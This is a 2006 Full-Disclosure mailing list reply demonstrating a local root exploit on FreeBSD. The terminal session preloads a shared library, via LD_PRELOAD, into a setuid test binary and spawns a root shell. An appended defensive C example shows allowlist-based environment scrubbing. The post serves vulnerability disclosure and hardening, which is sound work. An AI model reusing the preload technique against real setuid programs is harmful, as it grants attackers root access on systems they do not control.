Message-ID: <985b1a3d0611221355g4bd9824cmc69c835c9822330e@mail.gmail.com>
Date: Wed, 22 Nov 2006 22:55:37 +0100
From: "Tyop?" <tyoptyop@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Lack of environment sanitization in the FreeBSD, OpenBSD, NetBSD dynamic loaders.
On 11/22/06, In Cognito <defend.the.world@...il.com> wrote:
> Impact: Serious. May lead to privilege escalation.
>
> A class of security vulnerabilities has resurfaced in the dynamic loaders
> of FreeBSD, OpenBSD, and NetBSD in the sanitization of environment
> variables for suid and sgid binaries.
>
> Due to either badly implemented sanitization or a lack of it, a setuid
> binary may execute other processes with a tainted environment.
>
> [...]
>
> Have fun! Stay safe!
>
Fun. Not "perfectly" safe.
My experience:
%id
uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
%cat vuln.c
main()
{
setuid(0);
execl("/usr/bin/id","id",0);
}
%cc vuln.c -o vuln && chmod 4711 ./vuln
%exit
> id
uid=1001(tyop) gid=1001(tyop) groups=1001(tyop)
> ls -l vuln
-rws--x--x 1 root tyop 4827 Nov 22 22:46 vuln
> cat tyop.c
__attribute__ ((constructor)) main()
{
printf("[+] Hello from shared library land\n");
execle("/bin/sh","sh",0,0);
}
> cc -shared -o lib.so tyop.c
> setenv LD_PRELOAD "/home/tyop/test/lib.so"
> ./vuln
[+] Hello from shared library land
# id
uid=0(root) gid=0(wheel) egid=1001(tyop) groups=1001(tyop)
# echo "It works on `uname -sr`"
It works on FreeBSD 7.0-CURRENT-200609
#
Have a nice day.
--
Tyop?
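The session above shows the core of the problem: the setuid binary hands its inherited environment, LD_PRELOAD included, straight to execl(). A privileged program that must spawn children should not depend on the loader's scrubbing and should instead build the child's environment from an allowlist. The following is an added example written for this note, not code from the original post or from any BSD loader; the allowlist contents, the function names and the sample environment are my own constructions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

extern char **environ;

/* Variables a privileged program may forward to its children.
 * Anything not listed (LD_PRELOAD, LD_LIBRARY_PATH, ...) is dropped.
 * Constructed allowlist for this example; adjust per program. */
static const char *const allowed[] = { "PATH", "TERM", "LANG", "HOME", NULL };

/* Non-zero if the name part of "NAME=value" is on the allowlist. */
static int is_allowed(const char *entry) {
    const char *eq = strchr(entry, '=');
    size_t namelen = eq ? (size_t)(eq - entry) : strlen(entry);
    for (const char *const *p = allowed; *p; p++)
        if (strlen(*p) == namelen && strncmp(*p, entry, namelen) == 0)
            return 1;
    return 0;
}

/* Count entries of a NULL-terminated environment array. */
size_t env_count(char *const *env) { size_t n = 0; while (env[n]) n++; return n; }

/* Copy only allowlisted entries of src into a new NULL-terminated array.
 * Caller frees the array with free(); the strings are not copied. */
char **clean_env(char *const *src) {
    size_t n = env_count(src), k = 0;
    char **dst = calloc(n + 1, sizeof *dst);
    if (!dst) return NULL;
    for (size_t i = 0; i < n; i++)
        if (is_allowed(src[i])) dst[k++] = src[i];
    dst[k] = NULL;
    return dst;
}

/* Constructed sample environment mirroring the tainted one in the post. */
char *const sample_env[] = { "PATH=/usr/bin:/bin", "LD_PRELOAD=/home/tyop/test/lib.so",
                             "TERM=xterm", "LD_LIBRARY_PATH=/tmp", NULL };

/* Safe counterpart of vuln.c: execve() with the filtered copy instead of
 * execl() with the inherited environ. A real setuid program should also
 * check issetugid() and pin PATH to a fixed value rather than forward it. */
int main(void) {
    char **env = clean_env(environ);
    if (!env) return 1;
    char *const argv[] = { "id", NULL };
    execve("/usr/bin/id", argv, env);
    perror("execve");
    return 1;
}
```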
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/